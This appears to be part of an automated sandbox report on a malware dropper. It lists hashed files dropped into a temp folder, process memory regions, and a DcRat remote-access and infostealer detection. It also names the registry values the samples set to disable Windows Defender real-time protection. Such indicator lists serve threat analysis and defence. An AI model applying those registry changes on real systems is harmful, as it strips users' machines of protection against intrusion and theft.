SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

\Users\Admin\AppData\Local\Temp\7zS8D31384C\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe

MD5 fd028a8767b18e446c4c20c95bc1cd13
SHA1 9b3c725a720fc615cf9db72cf2449c558b4e87d3
SHA256 b7d92a51ae6861c7e3853b031acefb078268dfb5cab0b340017691d5f3ef2f05
SHA512 c1fb52eb12c26c9367cfd8c48fdc6c4310af5e58a873165ec9a4121ee999f84bef6a5602f01d3439881f45736cc2990ca76339cd5d76afa25a276c31a667bacb

\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe

MD5 fd028a8767b18e446c4c20c95bc1cd13
SHA1 9b3c725a720fc615cf9db72cf2449c558b4e87d3
SHA256 b7d92a51ae6861c7e3853b031acefb078268dfb5cab0b340017691d5f3ef2f05
SHA512 c1fb52eb12c26c9367cfd8c48fdc6c4310af5e58a873165ec9a4121ee999f84bef6a5602f01d3439881f45736cc2990ca76339cd5d76afa25a276c31a667bacb

\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe

MD5 fd028a8767b18e446c4c20c95bc1cd13
SHA1 9b3c725a720fc615cf9db72cf2449c558b4e87d3
SHA256 b7d92a51ae6861c7e3853b031acefb078268dfb5cab0b340017691d5f3ef2f05
SHA512 c1fb52eb12c26c9367cfd8c48fdc6c4310af5e58a873165ec9a4121ee999f84bef6a5602f01d3439881f45736cc2990ca76339cd5d76afa25a276c31a667bacb

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe

MD5 fd028a8767b18e446c4c20c95bc1cd13
SHA1 9b3c725a720fc615cf9db72cf2449c558b4e87d3
SHA256 b7d92a51ae6861c7e3853b031acefb078268dfb5cab0b340017691d5f3ef2f05
SHA512 c1fb52eb12c26c9367cfd8c48fdc6c4310af5e58a873165ec9a4121ee999f84bef6a5602f01d3439881f45736cc2990ca76339cd5d76afa25a276c31a667bacb

memory/1652-83-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1652-85-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1652-84-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1652-87-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1652-86-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1652-88-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1652-89-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1652-90-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1652-91-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1652-92-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1652-93-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1652-95-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1652-96-0x0000000064940000-0x0000000064959000-memory.dmp

memory/108-94-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue072fdbb8e4b2f5.exe

MD5 5678604b22617049dc686b524d3b583f
SHA1 98e0fc4a00542239f649459ccf8f6de22cb5e43e
SHA256 9a528cb1e010c11ed92aa9810e0021aee1b7c11e85db13e8b6bf97928c6cac5b
SHA512 483c4c7098dcb3e91674380a74fc6b04eb495cc88016068250c2d4641f8ac961b738f504474d7d1ba0cdf7b8285f04357cdb45d4b0e9fbb0ffa9b8fe63921bf5

memory/1808-97-0x0000000000000000-mapping.dmp

memory/1928-99-0x0000000000000000-mapping.dmp

memory/960-101-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07a633a94f9.exe

MD5 b7f786e9b13e11ca4f861db44e9fdc68
SHA1 bcc51246a662c22a7379be4d8388c2b08c3a3248
SHA256 f8987faadabfe4fd9c473ac277a33b28030a7c2a3ea20effc8b27ae8df32ddf6
SHA512 53185e79e9027e87d521aef18488b57b900d3415ee132c3c058ed49c5918dd53a6259463c976928e463ccc1e058d1c9c07e86367538c6bed612ede00c6c0f1a5

memory/1976-103-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07ef9e317e0f6ae.exe

MD5 63c74efb44e18bc6a0cf11e4d496ca51
SHA1 04a8ed3cf2d1b29b644fbb65fee5a3434376dfa0
SHA256 be76e36b5b66b15087662720d920e31d1bc718f4ed0861b97f10ef85bfb09f3c
SHA512 7cba62ff083db883cd172f6104b149bf3cf0b8836407d88093efff8d7bd4bc21ea4f3c951448f1c57b9eb33ca849a86731a2ac4d9c81793456e7ed009e20e402

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07b3bf87d8.exe

MD5 7b3895d03448f659e2934a8f9b0a52ae
SHA1 084dc9cd061c5fb90bfc17a935d9b6ca8947a33c
SHA256 898149d20045702c1bf0c4e552a907c763912d4e5d9cf5b348e1aae80928b097
SHA512 dcc1a140f364d7428fcf3ca85613a911524eb7872ef9076c89a8252fa16cefcdd3fe6d355c857585f8cea8f3e00a43f7ea088c296ecdb3012179db148cc6b25d

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07e35cf558.exe

MD5 210ee72ee101eca4bcbc50f9e450b1c2
SHA1 efea2cd59008a311027705bf5bd6a72da17ee843
SHA256 ccecc31183a26f9949252d33a8207f4e3ddb5a38fa1fbcbd22d7521942a40669
SHA512 8a6eacb4fb610ffb9457025e031824167a5cc6abe4f25168022ead62f6735b43a5e0f72a11d3efdb590f4f583d382d094789530d219113654d1db76c4be50a05

memory/976-107-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07caa83bac5d15.exe

MD5 7068e518575e5ab430815e14b33dd36e
SHA1 887df192fecd39a1c607ffe7552c573f25b9fda3
SHA256 1e4689aea99a6ddcf887e310d985013eb748d6b5cd30a81ec1a26ef154cd0cbd
SHA512 587d711bada21b2421f1a5ddb0beb004a17298c59751f633fd69b0e58983cbc38e0d0992e4ce0a98390aef887f7b81470e7027ff0901431a92b0bf897f7f2f6f

memory/664-105-0x0000000000000000-mapping.dmp

memory/472-109-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07267c17f2f5.exe

MD5 b4dd1caa1c9892b5710b653eb1098938
SHA1 229e1b7492a6ec38d240927e5b3080dd1efadf4b
SHA256 6a617cd85f6e4fa3861d97d1f8197e909f6ca895a1c6139171d26068656a4c95
SHA512 6285d20d85c2ca38c8dbb92bc8985371cddc9dbe042128e0cc6a48b24e52e5990a196b424a59aa84e551b67c91f5f58894dca2b9c5b130ea78076768e15ecae8

memory/1820-111-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue070aab9bc86b572.exe

MD5 82a9f8a4b7f7fcc967913bfeb63cfeba
SHA1 87366553ff702c334300151132ab956dbb803e5d
SHA256 59d466a488da2270d0ae53d9ad035c283a4ce08252bcfec8b65301a930875910
SHA512 bef4b52ab24d47a3c50615ce72c733485419ed84f686d48e77928a46be4ef078883351b68a446c0e9ce52c02a25945cb1d6c44cc04c1cdd5de7c66408ac75e2c

memory/1200-115-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07816149b72db00.exe

MD5 e20af8a334c27be684628d541b873a28
SHA1 ff88b3b58868256dfe9b47cdfad1f01be35f03ca
SHA256 d2b05eb480172829409440309b1f64977040a47c0b11f36d56801fcec8b6dde6
SHA512 041acadcde92cdccd76450b8cf512f0efb8bcfca142166bfdbd7f093e695fc948aef621c1a41ad8cf3e280b04ef441ec581367fb9a60e1aa821deb0f548ff401

memory/1788-119-0x0000000000000000-mapping.dmp

memory/1096-117-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0750373995e75.exe

MD5 5ac2df074a0e97b559cc5cc3f75b1805
SHA1 df6c2a71a936ef1776cf45877c87ed7b3974e015
SHA256 fde1639a2d7bff05994cf6dbaf8a46db57fa8c9ba8b4227e5da048c0b31d0d8b
SHA512 7150b7a26a68a94bd664e36be26cc1a0179a302c0b73dd627940c336f0f395a0835bbbbbf1cece0c993b2b4f0acd4ee20713dbe77b8de7916bedeaf7b9330529

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue071e59dc8292b4ef1.exe

MD5 b915b5247a3a217eb3cf0996ba2f9378
SHA1 f0ed113a152c1469b1174c9e18abf0a60d240347
SHA256 2a0f230c4a784be4418d778bc8fd8dab23345a5224545480a32d3b0383d5b9ba
SHA512 ba6f7cbfa498c4fcfda7624b2e8dbe3600f953180398bf485e07caedf808bf8f35c44f2009e8e4a95c60e75f09a5028c542ce2a757cd4b778c741ae4285daea8

memory/1952-121-0x0000000000000000-mapping.dmp

memory/1708-124-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue078a285ef7.exe

MD5 3c95af8f6495e8378f0cd823d134f79f
SHA1 f2719e53eef24c8d415722963b116a754f27b6ee
SHA256 a5bd395e719ccaba9376f81b3b171ec1d1b8c3b43e63d12c578ebefb37a9dee1
SHA512 ba28c3cae074bc63509763f5fbb8c38b0ecf15cef517a7a0a33f781b62657804322935949ab6d0a368e1d6286d65571b2d47f726359fb38b4064f82d8fac15f2

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe

MD5 9421bc53d00ce19532a4a0d73c759c0a
SHA1 09591d5782da6b20af28ba46189903792f663ef9
SHA256 bd3d796fabf7921062cae667e211fd5f1ba04b8a2629af74191211472bde8b62
SHA512 56979f8f34a459a2691dbc1d48ca5fed05000d02b0aa773903e5f8d919a291292ce16875c485cc96a12b650f2a764d052bb9b1da2da8d85e7ff2665ddf4aedc3

memory/1892-129-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue072fdbb8e4b2f5.exe

MD5 5678604b22617049dc686b524d3b583f
SHA1 98e0fc4a00542239f649459ccf8f6de22cb5e43e
SHA256 9a528cb1e010c11ed92aa9810e0021aee1b7c11e85db13e8b6bf97928c6cac5b
SHA512 483c4c7098dcb3e91674380a74fc6b04eb495cc88016068250c2d4641f8ac961b738f504474d7d1ba0cdf7b8285f04357cdb45d4b0e9fbb0ffa9b8fe63921bf5

memory/1992-132-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue072fdbb8e4b2f5.exe

MD5 5678604b22617049dc686b524d3b583f
SHA1 98e0fc4a00542239f649459ccf8f6de22cb5e43e
SHA256 9a528cb1e010c11ed92aa9810e0021aee1b7c11e85db13e8b6bf97928c6cac5b
SHA512 483c4c7098dcb3e91674380a74fc6b04eb495cc88016068250c2d4641f8ac961b738f504474d7d1ba0cdf7b8285f04357cdb45d4b0e9fbb0ffa9b8fe63921bf5

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe

MD5 2fa10132cfbce32a5ac7ee72c3587e8b
SHA1 30d26416cd5eef5ef56d9790aacc1272c7fba9ab
SHA256 cfb5c20ec8d95c35f7edb8743084d4491e43c62c575cf0102b4f6781c50689de
SHA512 4e9338f89229bdddb5d7c803a415a338a75962e61ef47984a67efd1e81824ac14039d9abe2b26992a30f6d26c724058518849d71b6d1948c00b08ae95b0fd25a

\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07a633a94f9.exe

MD5 b7f786e9b13e11ca4f861db44e9fdc68
SHA1 bcc51246a662c22a7379be4d8388c2b08c3a3248
SHA256 f8987faadabfe4fd9c473ac277a33b28030a7c2a3ea20effc8b27ae8df32ddf6
SHA512 53185e79e9027e87d521aef18488b57b900d3415ee132c3c058ed49c5918dd53a6259463c976928e463ccc1e058d1c9c07e86367538c6bed612ede00c6c0f1a5

memory/1996-140-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07a633a94f9.exe

MD5 b7f786e9b13e11ca4f861db44e9fdc68
SHA1 bcc51246a662c22a7379be4d8388c2b08c3a3248
SHA256 f8987faadabfe4fd9c473ac277a33b28030a7c2a3ea20effc8b27ae8df32ddf6
SHA512 53185e79e9027e87d521aef18488b57b900d3415ee132c3c058ed49c5918dd53a6259463c976928e463ccc1e058d1c9c07e86367538c6bed612ede00c6c0f1a5

\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07816149b72db00.exe

MD5 e20af8a334c27be684628d541b873a28
SHA1 ff88b3b58868256dfe9b47cdfad1f01be35f03ca
SHA256 d2b05eb480172829409440309b1f64977040a47c0b11f36d56801fcec8b6dde6
SHA512 041acadcde92cdccd76450b8cf512f0efb8bcfca142166bfdbd7f093e695fc948aef621c1a41ad8cf3e280b04ef441ec581367fb9a60e1aa821deb0f548ff401

memory/1672-148-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0750373995e75.exe

MD5 5ac2df074a0e97b559cc5cc3f75b1805
SHA1 df6c2a71a936ef1776cf45877c87ed7b3974e015
SHA256 fde1639a2d7bff05994cf6dbaf8a46db57fa8c9ba8b4227e5da048c0b31d0d8b
SHA512 7150b7a26a68a94bd664e36be26cc1a0179a302c0b73dd627940c336f0f395a0835bbbbbf1cece0c993b2b4f0acd4ee20713dbe77b8de7916bedeaf7b9330529

\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0750373995e75.exe

MD5 5ac2df074a0e97b559cc5cc3f75b1805
SHA1 df6c2a71a936ef1776cf45877c87ed7b3974e015
SHA256 fde1639a2d7bff05994cf6dbaf8a46db57fa8c9ba8b4227e5da048c0b31d0d8b
SHA512 7150b7a26a68a94bd664e36be26cc1a0179a302c0b73dd627940c336f0f395a0835bbbbbf1cece0c993b2b4f0acd4ee20713dbe77b8de7916bedeaf7b9330529

memory/952-150-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0750373995e75.exe

MD5 5ac2df074a0e97b559cc5cc3f75b1805
SHA1 df6c2a71a936ef1776cf45877c87ed7b3974e015
SHA256 fde1639a2d7bff05994cf6dbaf8a46db57fa8c9ba8b4227e5da048c0b31d0d8b
SHA512 7150b7a26a68a94bd664e36be26cc1a0179a302c0b73dd627940c336f0f395a0835bbbbbf1cece0c993b2b4f0acd4ee20713dbe77b8de7916bedeaf7b9330529

memory/1504-153-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07816149b72db00.exe

MD5 e20af8a334c27be684628d541b873a28
SHA1 ff88b3b58868256dfe9b47cdfad1f01be35f03ca
SHA256 d2b05eb480172829409440309b1f64977040a47c0b11f36d56801fcec8b6dde6
SHA512 041acadcde92cdccd76450b8cf512f0efb8bcfca142166bfdbd7f093e695fc948aef621c1a41ad8cf3e280b04ef441ec581367fb9a60e1aa821deb0f548ff401

memory/944-156-0x0000000000000000-mapping.dmp

memory/1992-157-0x0000000000350000-0x0000000000358000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue070aab9bc86b572.exe

MD5 82a9f8a4b7f7fcc967913bfeb63cfeba
SHA1 87366553ff702c334300151132ab956dbb803e5d
SHA256 59d466a488da2270d0ae53d9ad035c283a4ce08252bcfec8b65301a930875910
SHA512 bef4b52ab24d47a3c50615ce72c733485419ed84f686d48e77928a46be4ef078883351b68a446c0e9ce52c02a25945cb1d6c44cc04c1cdd5de7c66408ac75e2c

\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue070aab9bc86b572.exe

MD5 82a9f8a4b7f7fcc967913bfeb63cfeba
SHA1 87366553ff702c334300151132ab956dbb803e5d
SHA256 59d466a488da2270d0ae53d9ad035c283a4ce08252bcfec8b65301a930875910
SHA512 bef4b52ab24d47a3c50615ce72c733485419ed84f686d48e77928a46be4ef078883351b68a446c0e9ce52c02a25945cb1d6c44cc04c1cdd5de7c66408ac75e2c

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue070aab9bc86b572.exe

MD5 82a9f8a4b7f7fcc967913bfeb63cfeba
SHA1 87366553ff702c334300151132ab956dbb803e5d
SHA256 59d466a488da2270d0ae53d9ad035c283a4ce08252bcfec8b65301a930875910
SHA512 bef4b52ab24d47a3c50615ce72c733485419ed84f686d48e77928a46be4ef078883351b68a446c0e9ce52c02a25945cb1d6c44cc04c1cdd5de7c66408ac75e2c

memory/324-161-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue078a285ef7.exe

MD5 3c95af8f6495e8378f0cd823d134f79f
SHA1 f2719e53eef24c8d415722963b116a754f27b6ee
SHA256 a5bd395e719ccaba9376f81b3b171ec1d1b8c3b43e63d12c578ebefb37a9dee1
SHA512 ba28c3cae074bc63509763f5fbb8c38b0ecf15cef517a7a0a33f781b62657804322935949ab6d0a368e1d6286d65571b2d47f726359fb38b4064f82d8fac15f2

\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue078a285ef7.exe

MD5 3c95af8f6495e8378f0cd823d134f79f
SHA1 f2719e53eef24c8d415722963b116a754f27b6ee
SHA256 a5bd395e719ccaba9376f81b3b171ec1d1b8c3b43e63d12c578ebefb37a9dee1
SHA512 ba28c3cae074bc63509763f5fbb8c38b0ecf15cef517a7a0a33f781b62657804322935949ab6d0a368e1d6286d65571b2d47f726359fb38b4064f82d8fac15f2

memory/1160-164-0x0000000000000000-mapping.dmp

memory/1800-165-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue078a285ef7.exe

MD5 3c95af8f6495e8378f0cd823d134f79f
SHA1 f2719e53eef24c8d415722963b116a754f27b6ee
SHA256 a5bd395e719ccaba9376f81b3b171ec1d1b8c3b43e63d12c578ebefb37a9dee1
SHA512 ba28c3cae074bc63509763f5fbb8c38b0ecf15cef517a7a0a33f781b62657804322935949ab6d0a368e1d6286d65571b2d47f726359fb38b4064f82d8fac15f2

\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe

MD5 2fa10132cfbce32a5ac7ee72c3587e8b
SHA1 30d26416cd5eef5ef56d9790aacc1272c7fba9ab
SHA256 cfb5c20ec8d95c35f7edb8743084d4491e43c62c575cf0102b4f6781c50689de
SHA512 4e9338f89229bdddb5d7c803a415a338a75962e61ef47984a67efd1e81824ac14039d9abe2b26992a30f6d26c724058518849d71b6d1948c00b08ae95b0fd25a

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe

MD5 2fa10132cfbce32a5ac7ee72c3587e8b
SHA1 30d26416cd5eef5ef56d9790aacc1272c7fba9ab
SHA256 cfb5c20ec8d95c35f7edb8743084d4491e43c62c575cf0102b4f6781c50689de
SHA512 4e9338f89229bdddb5d7c803a415a338a75962e61ef47984a67efd1e81824ac14039d9abe2b26992a30f6d26c724058518849d71b6d1948c00b08ae95b0fd25a

memory/884-168-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07267c17f2f5.exe

MD5 b4dd1caa1c9892b5710b653eb1098938
SHA1 229e1b7492a6ec38d240927e5b3080dd1efadf4b
SHA256 6a617cd85f6e4fa3861d97d1f8197e909f6ca895a1c6139171d26068656a4c95
SHA512 6285d20d85c2ca38c8dbb92bc8985371cddc9dbe042128e0cc6a48b24e52e5990a196b424a59aa84e551b67c91f5f58894dca2b9c5b130ea78076768e15ecae8

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07267c17f2f5.exe

MD5 b4dd1caa1c9892b5710b653eb1098938
SHA1 229e1b7492a6ec38d240927e5b3080dd1efadf4b
SHA256 6a617cd85f6e4fa3861d97d1f8197e909f6ca895a1c6139171d26068656a4c95
SHA512 6285d20d85c2ca38c8dbb92bc8985371cddc9dbe042128e0cc6a48b24e52e5990a196b424a59aa84e551b67c91f5f58894dca2b9c5b130ea78076768e15ecae8

memory/1684-172-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07caa83bac5d15.exe

MD5 7068e518575e5ab430815e14b33dd36e
SHA1 887df192fecd39a1c607ffe7552c573f25b9fda3
SHA256 1e4689aea99a6ddcf887e310d985013eb748d6b5cd30a81ec1a26ef154cd0cbd
SHA512 587d711bada21b2421f1a5ddb0beb004a17298c59751f633fd69b0e58983cbc38e0d0992e4ce0a98390aef887f7b81470e7027ff0901431a92b0bf897f7f2f6f

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07caa83bac5d15.exe

MD5 7068e518575e5ab430815e14b33dd36e
SHA1 887df192fecd39a1c607ffe7552c573f25b9fda3
SHA256 1e4689aea99a6ddcf887e310d985013eb748d6b5cd30a81ec1a26ef154cd0cbd
SHA512 587d711bada21b2421f1a5ddb0beb004a17298c59751f633fd69b0e58983cbc38e0d0992e4ce0a98390aef887f7b81470e7027ff0901431a92b0bf897f7f2f6f

memory/376-178-0x0000000000000000-mapping.dmp

memory/1084-177-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07e35cf558.exe

MD5 210ee72ee101eca4bcbc50f9e450b1c2
SHA1 efea2cd59008a311027705bf5bd6a72da17ee843
SHA256 ccecc31183a26f9949252d33a8207f4e3ddb5a38fa1fbcbd22d7521942a40669
SHA512 8a6eacb4fb610ffb9457025e031824167a5cc6abe4f25168022ead62f6735b43a5e0f72a11d3efdb590f4f583d382d094789530d219113654d1db76c4be50a05

\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue071e59dc8292b4ef1.exe

MD5 b915b5247a3a217eb3cf0996ba2f9378
SHA1 f0ed113a152c1469b1174c9e18abf0a60d240347
SHA256 2a0f230c4a784be4418d778bc8fd8dab23345a5224545480a32d3b0383d5b9ba
SHA512 ba6f7cbfa498c4fcfda7624b2e8dbe3600f953180398bf485e07caedf808bf8f35c44f2009e8e4a95c60e75f09a5028c542ce2a757cd4b778c741ae4285daea8

\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue071e59dc8292b4ef1.exe

MD5 b915b5247a3a217eb3cf0996ba2f9378
SHA1 f0ed113a152c1469b1174c9e18abf0a60d240347
SHA256 2a0f230c4a784be4418d778bc8fd8dab23345a5224545480a32d3b0383d5b9ba
SHA512 ba6f7cbfa498c4fcfda7624b2e8dbe3600f953180398bf485e07caedf808bf8f35c44f2009e8e4a95c60e75f09a5028c542ce2a757cd4b778c741ae4285daea8

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue071e59dc8292b4ef1.exe

MD5 b915b5247a3a217eb3cf0996ba2f9378
SHA1 f0ed113a152c1469b1174c9e18abf0a60d240347
SHA256 2a0f230c4a784be4418d778bc8fd8dab23345a5224545480a32d3b0383d5b9ba
SHA512 ba6f7cbfa498c4fcfda7624b2e8dbe3600f953180398bf485e07caedf808bf8f35c44f2009e8e4a95c60e75f09a5028c542ce2a757cd4b778c741ae4285daea8

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07e35cf558.exe

MD5 210ee72ee101eca4bcbc50f9e450b1c2
SHA1 efea2cd59008a311027705bf5bd6a72da17ee843
SHA256 ccecc31183a26f9949252d33a8207f4e3ddb5a38fa1fbcbd22d7521942a40669
SHA512 8a6eacb4fb610ffb9457025e031824167a5cc6abe4f25168022ead62f6735b43a5e0f72a11d3efdb590f4f583d382d094789530d219113654d1db76c4be50a05

memory/1752-183-0x0000000000000000-mapping.dmp

memory/1652-188-0x0000000064940000-0x0000000064959000-memory.dmp

memory/376-193-0x0000000000400000-0x000000000046D000-memory.dmp

memory/376-195-0x0000000000400000-0x000000000046D000-memory.dmp

memory/1512-196-0x0000000000000000-mapping.dmp

memory/1084-198-0x0000000002CC0000-0x0000000002D3B000-memory.dmp

memory/1084-199-0x00000000002C0000-0x0000000000394000-memory.dmp

memory/944-200-0x0000000002D40000-0x0000000002D50000-memory.dmp

memory/944-201-0x0000000000240000-0x0000000000249000-memory.dmp

memory/1672-203-0x0000000000300000-0x0000000000372000-memory.dmp

memory/944-202-0x0000000000400000-0x0000000002B91000-memory.dmp

memory/952-204-0x0000000000070000-0x00000000000A0000-memory.dmp

memory/1084-205-0x0000000000400000-0x0000000002BFB000-memory.dmp

memory/324-206-0x0000000002D90000-0x0000000002DB9000-memory.dmp

memory/1388-209-0x0000000000000000-mapping.dmp

memory/1684-208-0x0000000000C60000-0x0000000000D6E000-memory.dmp

memory/324-207-0x0000000000240000-0x0000000000288000-memory.dmp

memory/324-211-0x0000000000400000-0x0000000002BA9000-memory.dmp

memory/944-212-0x0000000000400000-0x0000000002B91000-memory.dmp

memory/952-213-0x0000000000290000-0x0000000000296000-memory.dmp

memory/2192-214-0x0000000000000000-mapping.dmp

memory/2244-217-0x0000000000000000-mapping.dmp

memory/2232-216-0x0000000000000000-mapping.dmp

memory/2272-220-0x0000000000000000-mapping.dmp

memory/1800-222-0x0000000071460000-0x0000000071A0B000-memory.dmp

memory/2176-223-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2176-224-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2176-226-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2176-227-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2176-228-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2176-229-0x000000000041C5CA-mapping.dmp

memory/2176-231-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2176-233-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2444-235-0x0000000000000000-mapping.dmp

memory/376-238-0x0000000000400000-0x000000000046D000-memory.dmp

memory/2700-237-0x0000000000000000-mapping.dmp

memory/2756-240-0x0000000000000000-mapping.dmp

memory/2800-242-0x0000000000000000-mapping.dmp

memory/2820-243-0x0000000000000000-mapping.dmp

memory/2840-246-0x0000000000000000-mapping.dmp

memory/2880-248-0x0000000000000000-mapping.dmp

memory/1084-251-0x0000000002CC0000-0x0000000002D3B000-memory.dmp

memory/324-252-0x0000000000400000-0x0000000002BA9000-memory.dmp

memory/1084-253-0x0000000000400000-0x0000000002BFB000-memory.dmp

memory/324-254-0x0000000002D90000-0x0000000002DB9000-memory.dmp

memory/2880-255-0x0000000001FF0000-0x0000000002C3A000-memory.dmp

memory/2880-256-0x0000000001FF0000-0x0000000002C3A000-memory.dmp

memory/1800-257-0x0000000071460000-0x0000000071A0B000-memory.dmp

memory/2260-258-0x0000000000000000-mapping.dmp

memory/2280-259-0x0000000000000000-mapping.dmp

memory/2360-261-0x0000000000000000-mapping.dmp

memory/1160-263-0x0000000004390000-0x0000000004535000-memory.dmp

memory/2880-265-0x0000000001FF0000-0x0000000002C3A000-memory.dmp

memory/2424-264-0x0000000000000000-mapping.dmp

memory/2880-266-0x0000000001FF0000-0x0000000002C3A000-memory.dmp

memory/2684-267-0x0000000000000000-mapping.dmp

memory/2708-271-0x0000000000000000-mapping.dmp

memory/2684-270-0x000000000265F000-0x000000000268A000-memory.dmp

memory/1780-269-0x0000000000000000-mapping.dmp

memory/2120-273-0x0000000000000000-mapping.dmp

memory/2796-274-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-08-06 16:06

Reported

2022-08-06 16:08

Platform

win10v2004-20220721-en

Max time kernel

100s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe"

Signatures

DcRat

rat infostealer dcrat

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\Documents\SHIsoob4Etj_lU6f_UIAVLsv.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07006d6b7c.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07006d6b7c.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\Documents\SHIsoob4Etj_lU6f_UIAVLsv.exe | N/A
